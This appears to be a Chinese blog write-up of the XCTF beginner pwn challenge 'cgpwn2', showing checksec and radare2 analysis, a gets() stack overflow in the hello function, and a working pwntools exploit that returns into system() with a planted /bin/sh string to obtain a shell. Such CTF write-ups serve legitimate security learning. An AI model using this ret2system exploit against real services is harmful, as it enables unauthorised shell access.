XCTF-简单题-pwn-008-cgpwnj解题记录

最新推荐文章于 2024-06-05 16:45:03 发布
最新推荐文章于 2024-06-05 16:45:03 发布
阅读量470 收藏
点赞数
分类专栏: pwn题 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Morphy_Amo/article/details/121780117
版权

XCTF-新手区-pwn-008-cgpwn

  1. 查看安全策略

    root@kali:~/ctf/xctf/pwn/easy# checksec easy_008_cgpwn2 
[*] '/root/ctf/xctf/pwn/easy/easy_008_cgpwn2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

  2. 分析字符串

    [0x08048450]> iz
[Strings]
Num Paddr      Vaddr      Len Size Section  Type  String
000 0x00000700 0x08048700  11  12 (.rodata) ascii echo hehehe
001 0x0000070c 0x0804870c  24  25 (.rodata) ascii please tell me your name
002 0x00000728 0x08048728  38  39 (.rodata) ascii hello,you can leave some message here:
003 0x0000074f 0x0804874f   9  10 (.rodata) ascii thank you

    未发现/bin/sh

  3. 分析函数

    [0x08048450]> afl
0x08048450    1 34           entry0
0x08048440    1 6            sym.imp.__libc_start_main
0x08048490    4 42           sym.deregister_tm_clones
0x080484c0    4 55           sym.register_tm_clones
0x08048500    3 30           entry.fini0
0x08048520    4 45   -> 44   entry.init0
0x080486e0    1 2            sym.__libc_csu_fini
0x08048480    1 4            sym.__x86.get_pc_thunk.bx
0x080486e4    1 20           sym._fini
0x08048562    9 162          sym.hello
0x0804854d    1 21           sym.pwn
0x08048420    1 6            sym.imp.system
0x08048670    4 97           sym.__libc_csu_init
0x08048604    1 96           main
0x080483e0    1 6            sym.imp.setbuf
0x08048410    1 6            sym.imp.puts
0x080483a0    3 35           sym._init
0x08048430    1 6            loc.imp.__gmon_start
0x080483f0    1 6            sym.imp.gets
0x08048400    1 6            sym.imp.fgets

    发现sym.imp.system,同时还发现有sym.__libc_csu_init这个有万能gadget的函数

  4. 寻找溢出点

    sym.hello中发现一处使用了危险函数gets

    |       `-> 0x080485bc      c704240c8704.  mov dword [esp], str.please_tell_me_your_name ; [0x804870c:4]=0x61656c70 ; "please tell me your name"                          
|           0x080485c3      e848feffff     call sym.imp.puts

|           0x080485c8      a144a00408     mov eax, dword [obj.stdin]  ; obj.stdin__GLIBC_2.0                                                                             
|                                                                      ; [0x804a044:4]=0                                                                                  
|           0x080485cd      89442408       mov dword [var_8h], eax
|           0x080485d1      c74424043200.  mov dword [var_4h], 0x32    ; '2'
|                                                                      ; [0x32:4]=-1 ; 50                                                                                 
|           0x080485d9      c7042480a004.  mov dword [esp], obj.name   ; [0x804a080:4]=0                                                                                  
|           0x080485e0      e81bfeffff     call sym.imp.fgets

...
|           0x080485f1      8d45da         lea eax, dword [var_26h]
|           0x080485f4      890424         mov dword [esp], eax
|           0x080485f7      e8f4fdffff     call sym.imp.gets
|           0x080485fc      90             nop

  5. 构造payload

    结合上述分析,在输入name时,输入/bin/sh,然后利用溢出点使system执行输入name

    binsh = 0x804a080
sym = 0x08048420
payload = 'a' * (0x26 + 0x4) + p32(sym) + p32(0) + p32(binsh)

  6. exp

    from pwn import *

conn = process('./easy-008-cgpwn')

binsh = 0x804a080
sym = 0x08048420
payload = 'a' * (0x26 + 0x4) + p32(sym) + p32(0) + p32(binsh)

conn.sendlineafter('please tell me your name\n', '/bin/sh')
conn.sendlineafter('you can leave some message here:', payload)
conn.interactive()
Morphy_Amo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
从零开始入门pwn(一):pwn的介绍以及部分前置知识
m0_51466347的博客
12-06 4万+
目录 一.前言 二.pwn的介绍 pwn的定义 pwn目模式 前置知识 一.Linux 二.C语言 三.汇编语言 四.计算机组成原理 三.总结 一.前言 本人凭着一腔热血想要入门pwn,但却被pwn的高入门门槛泼了一次又一次冷水,趁着自己还记得,写一点心得为后来想入门的跟我一样的零基础新手提供一些帮助。 二.pwn的介绍 pwn的定义 想必很多想要入门的新手都已经通过各种各样的入门文章或视频了解了pwn的定义以及方向,但出于礼貌,我在这里还是再重复一下下。...
XCTF-简单-pwn-004
Morphy_Amo的博客
12-09 631
CTF-pwn-新手区-004
PWN入门(从零开始学习PWN
devil8123665的博客
09-17 4607
https://www.zhihu.com/people/Jwizard/posts https://www.jianshu.com/p/187b810e78d2
PWN 基础篇 Write Up
qq_61553520的博客
10-02 499
data 信息第一句定义了一个名为_data的数据段。segment关键字用于声明一个新的段,dword表示每个数据元素的大小为 4 字节,public表示该段可以在其他模块中访问,'DATA'是标识符,用于标识数据段。第二句则是将代码段(.text)的默认段寄存器cs和数据段(.data)的_data段寄存器进行关联。assume关键字用于指定段寄存器与段的关系,在这里它指定了cs寄存器与_data段寄存器的关联。通过这两句指令,我们可以确保在程序运行时,使用cs寄存器来访问_data段。
pwn学习】pwn中常用工具
Morphy_Amo的博客
01-10 4947
本文整理了在pwn中常用的一些工具,随着学习的深入也会不断添加
攻防世界XCTF-Pwn入门11解题报告
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-05 662
如果你也想学习:黑客&网络安全的零基础攻防教程Pwn是CTF中至关重要的项目,一般来说都是Linux二进制目,零基础的同学可以看《程序员的自我修养》,主要型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。
XCTF-简单-pwn-003
Morphy_Amo的博客
12-10 551
XCTF-pwn-新手区-003
XCTF-简单-pwn-009-level3 writeup
Morphy_Amo的博客
12-10 435
XCTF-新手区-pwn-009-level3
XCTF-Web-高手区-supersqli
1stPeak's Blog
06-21 721
解题 1、使用常规的SQL注入操作进行注入,我们测试一下单引号 根据返回显示,我们可以判断目标源码中的SQL语句是字符型的,使用单引号闭合 我们本地使用mysql测试如下 2、使用#、--进行测试 发现报错,直接试试编码,将#或--替换为%23或--+ 3、接下来使用order by判断字段数 可以发现,存在两个字段数 4、使用union select判断哪个位置的字段可以进行注入 发现存在过滤,将我的语句过滤了 5、使用堆叠注入 (1)查看所有数据库名 (2)查看所有表名 (3
XCTF-HW-pipeline附件
11-09
附件
XCTF-RE】新手练习区-open-source.c
08-03
目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
XCTF-Mobile】新手练习区-12.rar
09-01
目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习区-logmein
08-03
目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习区-re1.exe
08-03
目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ugg9gy
【创新未发表】Matlab实现黏菌优化算法SMA-Kmean-Transformer-LSTM负荷预测算法研究.rar
最新发布
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
PyTorch使用教程.pdf
07-29
PyTorch 是一个开源的机器学习库,广泛用于计算机视觉和自然语言处理等领域。以下是一个简化的 PyTorch 使用教程,不采用分点或Markdown格式。 首先,确保你安装了 PyTorch。你可以通过访问 PyTorch 官网获取安装指令,根据你的系统环境(如 Windows, macOS, Linux)和是否使用 GPU 支持进行安装。 安装完成后,你可以开始编写 PyTorch 代码了。 这里,我们将通过一个简单的例子来展示 PyTorch 的基本用法:创建一个简单的神经网络来识别手写数字(基于 MNIST 数据集)。
ubuntu man帮助手册
07-29
ubuntu man帮助手册
彩屏驱动开发技术资料提高篇TFT-51-11.zip
07-29
彩屏驱动开发技术资料提高篇TFT-51-11.zip
web-ics-05
07-28
- 这道可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X-forwarded-For=127.0.0.1。\[2\] - preg_replace函数可以执行正则...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Morphy_Amo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值